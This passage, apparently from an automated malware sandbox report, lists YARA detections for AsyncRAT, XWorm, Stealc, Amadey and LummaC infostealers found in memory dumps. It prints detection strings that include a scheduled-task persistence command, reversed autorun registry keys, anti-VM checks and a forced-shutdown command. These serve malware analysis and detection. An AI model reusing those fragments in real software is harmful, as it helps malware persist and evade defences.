0000002C.00000003.3319485520.000000000407E000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9a59:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14139:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3319485520.000000000406E000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9a51:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000006.00000003.2301401913.0000000004E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0xa3af:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x300:$a2: Stub.exe 0x390:$a2: Stub.exe 0xb708:$a2: Stub.exe 0xb798:$a2: Stub.exe 0x71cd:$a3: get_ActivatePong 0xa5c7:$a4: vmware 0xa43f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7f1c:$a6: get_SslClient
0000002C.00000003.3255556898.0000000004055000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa441:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000003.00000002.2258579469.0000000000E61000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000008.00000002.4565122360.0000000000C21000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000034.00000002.4566675637.0000000000BC2000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9771:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000008.00000003.2519256934.0000000005280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000003.2104038300.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001D.00000002.4575261917.00000000020E0000.00000040.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9aa5:$s6: VirtualBox 0x9a03:$s8: Win32_ComputerSystem 0xa5a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa644:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa759:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa103:$cnc4: POST / HTTP/1.1
0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x8b47:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9ea0:$a2: Stub.exe 0x9f30:$a2: Stub.exe 0xa8a8:$a2: Stub.exe 0xb140:$a2: Stub.exe 0x5965:$a3: get_ActivatePong 0x8d5f:$a4: vmware 0x8bd7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x66b4:$a6: get_SslClient 0x118bc:$a6: get_SslClient
0000002C.00000003.3319803924.0000000001824000.00000004.00000020.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8bd9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000001D.00000002.4569892251.000000000064B000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2a1e5:$s6: VirtualBox 0x2a143:$s8: Win32_ComputerSystem 0x2ace7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2ad84:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2ae99:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2a843:$cnc4: POST / HTTP/1.1
00000000.00000003.2089889800.0000000000F93000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2287568348.0000000000591000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x9fa7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x153af:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x207b7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xb300:$a2: Stub.exe 0xb390:$a2: Stub.exe 0x16708:$a2: Stub.exe 0x16798:$a2: Stub.exe 0x21b10:$a2: Stub.exe 0x21ba0:$a2: Stub.exe 0x6dc5:$a3: get_ActivatePong 0x121cd:$a3: get_ActivatePong 0x1d5d5:$a3: get_ActivatePong 0xa1bf:$a4: vmware 0x155c7:$a4: vmware 0x209cf:$a4: vmware 0xa037:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x1543f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x20847:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x7b14:$a6: get_SslClient 0x12f1c:$a6: get_SslClient 0x1e324:$a6: get_SslClient
0000002C.00000003.3250710054.000000000404A000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xa039:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x15441:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x20849:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: SQ1NgqeTQy.exe PID: 4088	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: SQ1NgqeTQy.exe PID: 4088	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SQ1NgqeTQy.exe PID: 4088	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe PID: 5008	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe PID: 5008	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: regsvr32.exe PID: 1788	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 1788	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: regsvr32.exe PID: 1788	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 1788	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: Macromedia.com PID: 1124	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Macromedia.com PID: 1124	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xd06c:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x18a67:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x27670:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x428b3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xa9d2d:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xc14d7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0xdd68b:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x11d9f8:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x13d7f7:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: MSBuild.exe PID: 4724	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: MSBuild.exe PID: 4724	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0xb691:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 69 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
29.2.regsvr32.exe.8a0000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.2.regsvr32.exe.8a0000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
29.2.regsvr32.exe.8a0000.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
29.2.regsvr32.exe.8a0000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
44.3.Macromedia.com.4055ad0.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
44.3.Macromedia.com.4055ad0.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7adf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48fd:$a3: get_ActivatePong 0x7cf7:$a4: vmware 0x7b6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x564c:$a6: get_SslClient
44.3.Macromedia.com.4055ad0.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x48fd:$str01: get_ActivatePong 0x564c:$str02: get_SslClient 0x5668:$str03: get_TcpClient 0x3f13:$str04: get_SendSync 0x3f63:$str05: get_IsConnected 0x4692:$str06: set_UseShellExecute 0x7e15:$str07: Pastebin 0x7e97:$str08: Select * from AntivirusProduct 0x8e38:$str09: Stub.exe 0x8ec8:$str09: Stub.exe 0x7bef:$str10: timeout 3 > NUL 0x7adf:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x7b6f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
44.3.Macromedia.com.4055ad0.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7b71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
52.2.MSBuild.exe.bc0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
52.2.MSBuild.exe.bc0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
52.2.MSBuild.exe.bc0000.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x98df:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x66fd:$a3: get_ActivatePong 0x9af7:$a4: vmware 0x996f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x744c:$a6: get_SslClient
52.2.MSBuild.exe.bc0000.0.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x66fd:$str01: get_ActivatePong 0x744c:$str02: get_SslClient 0x7468:$str03: get_TcpClient 0x5d13:$str04: get_SendSync 0x5d63:$str05: get_IsConnected 0x6492:$str06: set_UseShellExecute 0x9c15:$str07: Pastebin 0x9c97:$str08: Select * from AntivirusProduct 0xac38:$str09: Stub.exe 0xacc8:$str09: Stub.exe 0x99ef:$str10: timeout 3 > NUL 0x98df:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x996f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
52.2.MSBuild.exe.bc0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9971:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
44.3.Macromedia.com.4055ad0.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
44.3.Macromedia.com.4055ad0.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x7adf:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x8e38:$a2: Stub.exe 0x8ec8:$a2: Stub.exe 0x48fd:$a3: get_ActivatePong 0x7cf7:$a4: vmware 0x7b6f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x564c:$a6: get_SslClient
44.3.Macromedia.com.4055ad0.1.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x48fd:$str01: get_ActivatePong 0x564c:$str02: get_SslClient 0x5668:$str03: get_TcpClient 0x3f13:$str04: get_SendSync 0x3f63:$str05: get_IsConnected 0x4692:$str06: set_UseShellExecute 0x7e15:$str07: Pastebin 0x7e97:$str08: Select * from AntivirusProduct 0x8e38:$str09: Stub.exe 0x8ec8:$str09: Stub.exe 0x7bef:$str10: timeout 3 > NUL 0x7adf:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x7b6f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
44.3.Macromedia.com.4055ad0.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x7b71:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
29.2.regsvr32.exe.8a0000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.2.regsvr32.exe.8a0000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
29.2.regsvr32.exe.8a0000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
29.2.regsvr32.exe.8a0000.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
29.2.regsvr32.exe.8a0000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
44.3.Macromedia.com.406c2e0.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
44.3.Macromedia.com.406c2e0.2.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
44.3.Macromedia.com.406c2e0.2.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x98df:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x66fd:$a3: get_ActivatePong 0x9af7:$a4: vmware 0x996f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x744c:$a6: get_SslClient
44.3.Macromedia.com.406c2e0.2.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x66fd:$str01: get_ActivatePong 0x744c:$str02: get_SslClient 0x7468:$str03: get_TcpClient 0x5d13:$str04: get_SendSync 0x5d63:$str05: get_IsConnected 0x6492:$str06: set_UseShellExecute 0x9c15:$str07: Pastebin 0x9c97:$str08: Select * from AntivirusProduct 0xac38:$str09: Stub.exe 0xacc8:$str09: Stub.exe 0x99ef:$str10: timeout 3 > NUL 0x98df:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x996f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
44.3.Macromedia.com.406c2e0.2.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9971:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
29.2.regsvr32.exe.20e131e.2.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.2.regsvr32.exe.20e131e.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
29.2.regsvr32.exe.20e131e.2.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
29.2.regsvr32.exe.20e131e.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
29.2.regsvr32.exe.66ca5e.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.2.regsvr32.exe.66ca5e.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
29.2.regsvr32.exe.66ca5e.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x5902:$str01: $VB$Local_Port 0x58f3:$str02: $VB$Local_Host 0x5bb1:$str03: get_Jpeg 0x5649:$str04: get_ServicePack 0x6a77:$str05: Select * from AntivirusProduct 0x6c75:$str06: PCRestart 0x6c89:$str07: shutdown.exe /f /r /t 0 0x6d3b:$str08: StopReport 0x6d11:$str09: StopDDos 0x6e07:$str10: sendPlugin 0x6fa5:$str12: -ExecutionPolicy Bypass -File " 0x70ca:$str13: Content-length: 5235
29.2.regsvr32.exe.66ca5e.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6987:$s6: VirtualBox 0x68e5:$s8: Win32_ComputerSystem 0x7489:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7526:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x763b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fe5:$cnc4: POST / HTTP/1.1
44.3.Macromedia.com.4055ad0.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
44.3.Macromedia.com.4055ad0.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
44.3.Macromedia.com.4055ad0.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x98df:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x66fd:$a3: get_ActivatePong 0x9af7:$a4: vmware 0x996f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x744c:$a6: get_SslClient
44.3.Macromedia.com.4055ad0.1.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x66fd:$str01: get_ActivatePong 0x744c:$str02: get_SslClient 0x7468:$str03: get_TcpClient 0x5d13:$str04: get_SendSync 0x5d63:$str05: get_IsConnected 0x6492:$str06: set_UseShellExecute 0x9c15:$str07: Pastebin 0x9c97:$str08: Select * from AntivirusProduct 0xac38:$str09: Stub.exe 0xacc8:$str09: Stub.exe 0x99ef:$str10: timeout 3 > NUL 0x98df:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x996f:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
44.3.Macromedia.com.4055ad0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9971:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
44.3.Macromedia.com.4055ad0.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
44.3.Macromedia.com.4055ad0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
44.3.Macromedia.com.4055ad0.0.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x98df:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x14ce7:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0xac38:$a2: Stub.exe 0xacc8:$a2: Stub.exe 0x16040:$a2: Stub.exe 0x160d0:$a2: Stub.exe 0x66fd:$a3: get_ActivatePong 0x11b05:$a3: get_ActivatePong 0x9af7:$a4: vmware 0x14eff:$a4: vmware 0x996f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x14d77:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x744c:$a6: get_SslClient 0x12854:$a6: get_SslClient
44.3.Macromedia.com.4055ad0.0.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x66fd:$str01: get_ActivatePong 0x11b05:$str01: get_ActivatePong 0x744c:$str02: get_SslClient 0x12854:$str02: get_SslClient 0x7468:$str03: get_TcpClient 0x12870:$str03: get_TcpClient 0x5d13:$str04: get_SendSync 0x1111b:$str04: get_SendSync 0x5d63:$str05: get_IsConnected 0x1116b:$str05: get_IsConnected 0x6492:$str06: set_UseShellExecute 0x1189a:$str06: set_UseShellExecute 0x9c15:$str07: Pastebin 0x1501d:$str07: Pastebin 0x9c97:$str08: Select * from AntivirusProduct 0x1509f:$str08: Select * from AntivirusProduct 0xac38:$str09: Stub.exe 0xacc8:$str09: Stub.exe 0x16040:$str09: Stub.exe 0x160d0:$str09: Stub.exe 0x99ef:$str10: timeout 3 > NUL
44.3.Macromedia.com.4055ad0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x9971:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x14d79:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
29.2.regsvr32.exe.66ca5e.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
29.2.regsvr32.exe.66ca5e.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
29.2.regsvr32.exe.66ca5e.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
29.2.regsvr32.exe.66ca5e.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
29.2.regsvr32.exe.66ca5e.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
29.2.regsvr32.exe.20e131e.2.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
